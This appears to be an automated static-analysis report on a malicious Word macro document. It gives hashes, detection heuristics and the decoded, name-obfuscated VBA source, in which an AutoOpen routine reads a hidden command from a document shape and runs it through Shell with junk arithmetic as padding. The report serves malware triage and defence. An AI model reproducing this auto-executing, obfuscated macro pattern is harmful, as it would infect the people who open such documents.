Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2a3a8f12aac0e41a…

MALICIOUS

Office (OLE)

Size: 128.6 KB
Created: 2018-12-10 12:40:00
Authoring application: Microsoft Office Word
First seen: 2019-02-10
MD5: 5bf064ee8a7ec0cfa143253ae955e85f
SHA-1: 0d97771bd891537886800a21a0aa3fdde733e0a9
SHA-256: 2a3a8f12aac0e41af29962e229c5b0384e539d5ea2200f1a5dcc7193bad1648e
Risk Score: 292

Heuristics (10)

  • ClamAV: Doc.Malware.Dldk-6779283-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Dldk-6779283-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    . _
    Shell(okNhcmY, YbKwA), CZGjErAus)
        RroZKwKHDGBLPVNdmlMO = XXncsRwOrEUDjJsaHVnLo / Tan(158479366) * 298402642 / Tan(263114319) + DwUEhjqjruUBwRfMsMC - Cos(221132911) + (53753236 / Int(LUDfPZCwzdzBpTdKJUdWp))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub autoopen()
    ViTGu
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  4832 bytes
SHA-256: 573763d317169024caf632e5cbfa6b9d4a2e769f5ea435444118bc39b81f59c6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
135 of 162 identifiers look randomly generated (e.g. 'icZDdKfikGFzSzjtaLXMCsNG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "VSjKiRd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
ViTGu
End Sub

Attribute VB_Name = "NFqhzjORQXIO"
Function ViTGu()
On Error Resume Next
    IbQmsvkQkuwhtfjlAaA = rwzijzilrBsjVrVUNw / Tan(62689941) * 314581991 / Tan(106584079) + HjzZUmXFwLNVhKi - Cos(248660837) + (40321051 / Int(RzYiCNLBKLXBREHlqRiHfrO))
Set ChVAKLqbsQiRjYdlNTcMhw = JNvTNGwOalmjVsLqzUwIAaq
RnttLOBEFnMmOrd = tCDftsItBccrlosjXq
    EHzfohoTIYrBrz = vchwpKpLhpGWLhpKKTwQb / Tan(313987859) * 61672684 / Tan(95244939) + FoFtjkkPEjVjQjsOwQ - Cos(271599960) + (220977593 / Int(cmSOjhsiKzTTdkWk))
Set BFWHHBUaukFCifUjK = CmfzDrhujBQmwWiiPkKD
lwnmznjfUzmTIUwmCB = aNUSKHljYzPjWGGQnrMG
    OInCKDRnTawdNzGElPi = JJsAQAtNJtcjTYwJn / Tan(79309948) * 114184152 / Tan(327873154) + NqwviAfVpcwlIO - Cos(28475419) + (104077465 / Int(lKJDdawRKoBzRZwkNwTuFh))
Set NsUQfvKJttAaGozkPAdYLiYX = zAvSkVjDKvLIJS
AfHDQwrwNMDubJnjTz = huPrIYUXwsnbFhGX
    winsXpKdKBHUjNj = PztVoJmCCXhhzWW / Tan(197698568) * 141015900 / Tan(265978789) + qwPoJjfQoaQrkfVKh - Cos(16589855) + (304159090 / Int(mskpAIcfofdzvwtJzK))
Set pItwcmfzCcLobbTdzOaoA = zcIwRwnlMKXSEM
uHDULaDcqCYcTwuZWjlJQpj = jJQPBQIWHkCGWTpdwz
Set OLCdS = VSjKiRd.Shapes(CfsNiidIQ + "YCYMRZlapW" + ciMDIjEP).TextFrame
    kQFACKbGGTouFBS = wUvkXETcPkCNVBudQjTSdai / Tan(213518423) * 293816258 / Tan(336665774) + mjttMmpoKlYijz - Cos(187338208) + (242771472 / Int(INlFYLiYizOXpPrYA))
Set tVqqbfMkrrwmVBpNYfNw = XPUdmbQVVjJjQjOb
lFtoUmaviMicrMKBS = GWMpEvPVKoFESamGtI
    RWPYBOYkDCCjHBbjRCdTjE = WKfOnXotrSsbddIFYoUmw / Tan(126419226) * 112608749 / Tan(108130711) + bYsEmdGNptOWAlNOIKNOZ - Cos(326964795) + (21278715 / Int(wFiOSkDsOcMzwoF))
Set lOojuiXDHYnIDBLiVkIjwr = EqVHXZNRUFXcLJTOOhaGuwu
NQhiMjYquTktYaAiuGTDfY = VBWtzYkBHvjuGr
    WGqiGPBHPZZvbz = nIBmzVLwHQAJjHp / Tan(243721116) * 33793716 / Tan(333880881) + VaDIEkiOjQjAAiziUWajhLH - Cos(228137991) + (96845511 / Int(GVzZoTzjcjkzzCT))
Set ciXPAajdVOiSNKS = uwiJOJbPDUFStUYYNb
ZKzFfoWEZpfTSNPFzXJrS = HLfUOjAqGElbtJu
okNhcmY = OLCdS.ContainingRange + iUwfzNIE + ctiHO + BzZwbmpZ + dcihpN + pkTCv + qpaHERhC + UZDuBwj + IAFBH + icaNMjDH
    vDYPjDEGlBOvPLII = qEYkJsurakvnVDcNmVIFz / Tan(326247512) * 213335405 / Tan(275416239) + vziQTqzfiArMalK - Cos(195329971) + (160451091 / Int(SISPzlidqADjtYi))
Set OsMbHuvIqDlBLkzbbrOj = fBwhpAzbuGTdvWRRzwXNJY
zhRFDbIBJBsjqPtRuwjwwSX = NfKitqTcHHwAYuvzm
    sNdobESQifTflzIQVSPhKWuW = sPjBYdKUlJFMAjrOZzd / Tan(149064566) * 163372879 / Tan(223782355) + TLSqvGpWTGOjolO - Cos(65184254) + (17823667 / Int(LznDDVmXTkZQABK))
Set NqGmPNwnlFlzDcK = bNNiTQIzDXnEzDGNZjYYDP
zDARzjpUrampmnbowhJjrar = izYXXDljLTQiTwKNODwdLN
    WQwUSzHhluzXZki = qqECpwhYDYwuanWaNfk / Tan(156191683) * 161394084 / Tan(117581683) + XcNBzFirhwpVWlfQ - Cos(173384005) + (225978053 / Int(RtBMGwXXKuAKAYfjZcu))
Set SUhOvkRAohPJpwARVPGDZ = XwhopwqFFnfzHwMnRWjXj
fqVCYOLKWrKkwkjHvUJj = birqEEizkWCzuRqSnYc
    BYiIwqunLriLndPwSFY = nSSJDvFdPzYDBVzc / Tan(333830368) * 7533930 / Tan(308586474) + BaONZPZjnDMEqdkjF - Cos(164033455) + (35893650 / Int(kQXOSfJSjnzRKG))
Set MDFjnWWpLkUNYkOW = vthlCAuuFGDAGvtjQYf
oRfOaLdwRlhRQX = RZbJDKphPTpFpaiHMi
Const YbKwA = 0
    QhvJVSUzvVmkswn = YTjGqGIUbcHlviDiYYzcM / Tan(118441736) * 22433102 / Tan(331564932) + HkrXRflfBuCzPQKYbitKiEN - Cos(116332828) + (22551118 / Int(TALUGQiMiVRwKwVG))
Set nAiIImDljJnLDXZUELlThom = DhpHiYzocKaRUDLNI
XGuAfwrcFkkmMzNQFbzvH = MwiszIzAAXKwQjXC
    MKAfUWZkizjwUXDvYpkLZ = XUMskWHSuJUWfR / Tan(316647940) * 89099488 / Tan(134735297) + BdqdUKAsllfBKHLJmfTclCc - Cos(106990329) + (19446173 / Int(cwsmwLVuJvMuzCrslWm))
Set wMKViQusEzBZaziCzzmUjQz = wsfQktRGdKYPnWHiQ
pKunUCTpsljRMiOuZmkd = LhuvQYTPdrEDCan
    oIkACAWdTwLNtzi = SMrRMuMwCidKjKtYi / Tan(142919063) * 171874670 / Tan(145455999) + ivZJwarTDwWfAtpEovtwl - Cos(332459693) + (158529776 / Int(LuJFnfXXIdoRSHOUUf))
Set fGfiQDTtajZzfXBwERmjYbzW = FYmhhZbFzsQfLtBTlz
jiItQJKCizaEHJLKihMtHz = jflSsXkMndJnsziVXWWtFYn
PCTMEqwaD = Array(wkQMb, tvSmAj, EkNbNih, Interaction _
. _
Shell(okNhcmY, YbKwA), CZGjErAus)
    RroZKwKHDGBLPVNdmlMO = XXncsRwOrEUDjJsaHVnLo / Tan(158479366) * 298402642 / Tan(263114319) + DwUEhjqjruUBwRfMsMC - Cos(221132911) + (53753236 / Int(LUDfPZCwzdzBpTdKJUdWp))
Set YZKEIzvLqGTUmzBCT = dvuqBvbMiiChEltww
ULQDAnnthUhiJHBLstVi = OcvQNJICibpDXhHAav
    icZDdKfikGFzSzjtaLXMCsNG = ltNbtiAtjrsUzwhwvwvPI / Tan(72669493) * 285547822 / Tan(308747523) + qGnEzlPSSsRSGr - Cos(185464911) + (33513520 / Int(lHqZdOpNGwSrca))
Set SaCYNpiGdBiDQj = ESKEZjEbNrwrqpzaqSPzfo
sODBMXwLYjSrzh = BSOzpjOwrQjbnlBhIQ
End Function